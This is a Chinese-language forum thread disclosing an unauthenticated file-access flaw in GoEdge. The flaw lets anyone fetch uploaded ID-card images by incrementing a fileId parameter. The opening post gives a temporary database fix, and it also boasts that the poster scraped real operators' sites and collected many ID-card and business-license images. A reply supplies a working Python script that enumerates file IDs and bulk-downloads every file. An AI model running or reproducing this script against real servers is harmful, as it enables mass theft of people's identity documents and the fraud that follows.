每日签到
奶昔超市
积分商城
奶昔访达
添加到桌面
收藏本站
切换到宽版
板块
NaixiBBS
扩展
Fun
登录
注册
奶昔论坛
»
板块
›
内容区
›
技术
›
Goedge静态文件路径未鉴权,泄露用户身份证件信息 ...
返回列表
发布新帖
查看:
2316
|
回复:
3
[安全]
Goedge静态文件路径未鉴权,泄露用户身份证件信息
kunkun
kunkun
当前离线
积分
4373
雷达卡
发表于 2024-8-18 04:55:10
|
查看全部
|
阅读模式
登录后免广告,享受更多奶昔会员权益!
您需要
登录
才可以下载或查看,没有账号?
注册
×
经测试Goedge用户端上传的静态资源和实名认证时上传的身份证图片全部都在 /files/file 这个路由下
只要用户端地址+/files/file?fileId=1 就可以获取到上传的图片附件(主控端也一样)
虽然上传身份证时在数据库的 isPublic 字段确实是不公开的,但是goedge却没有判断这个字段,还是可以公开访问
目前只有一个临时解决方案,在数据库执行这个这个命令,把证件附件的状态改一下(改了后就访问不了,审核的时候也看不到),这个bug还需要goedge那边进行修复
UPDATE edgefiles SET state = 0 WHERE type = 'user.idcard';
复制代码
根据以上规则,写个脚本就可以批量拿到该系统上传的所有图片文件
方能和安捷自家用的都是Goedge,随便爬一下拿到不少身份证正反面和营业执照的图片
上传
,
这个
,
身份证
,
图片
,
Goedge
爱生活,爱奶昔~
回复
使用道具
举报
照妖镜
摆烂咕咕
摆烂咕咕
当前离线
积分
4598
雷达卡
发表于 2024-8-18 08:24:53
|
查看全部
啊哈哈哈~来不拉力~
爱生活,爱奶昔~
回复
支持
反对
使用道具
举报
照妖镜
zezhiya
zezhiya
当前离线
积分
182
雷达卡
发表于 2024-8-18 13:20:52
|
查看全部
import requests
import os
# 创建保存图片的文件夹
save_dir = 'downloaded_images'
if not os.path.exists(save_dir):
os.makedirs(save_dir)
# 循环下载图片
base_url = 'https://域名/files/file?fileId='
start_id = 1
end_id = 129
for file_id in range(start_id, end_id + 1):
url = f'{base_url}{file_id}'
response = requests.get(url)
if response.status_code == 200:
file_path = os.path.join(save_dir, f'image_{file_id}.jpg')
with open(file_path, 'wb') as f:
f.write(response.content)
print(f'Successfully downloaded {file_path}')
else:
print(f'Failed to download {url}')
print('All downloads completed.')
复制代码
爱生活,爱奶昔~
回复
支持
反对
使用道具
举报
照妖镜
Ranking5
Ranking5
当前离线
积分
184
雷达卡
发表于 2024-9-10 14:24:32
|
查看全部
Goedge的作者真的卖了吗?
爱生活,爱奶昔~
回复
支持
反对
使用道具
举报
照妖镜
返回列表
发布新帖
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
注册
本版积分规则
发表回复
回帖后跳转到最后一页
浏览过的版块
茶馆
金融
通信
推广
点数市场
跨境
人工智能
站务
交易
相关网站
9eSIM
eSTKme
eSIM.GG
RedteaGO
蚊子玩卡
站内导航
RSS
Sitemap
CDK
SSO
更多...
站务支持
用户认证制度
User Verification System
获取邀请码
广告招商
联系支持
卡粉专属群
加入官方群
© 2026
Naixi Networks
.
沪ICP备13020230号-1
|
沪公网安备 31010702007642号
手机版
小黑屋
RSS
返回顶部
关灯
在本版发帖
快速回复
返回顶部
返回列表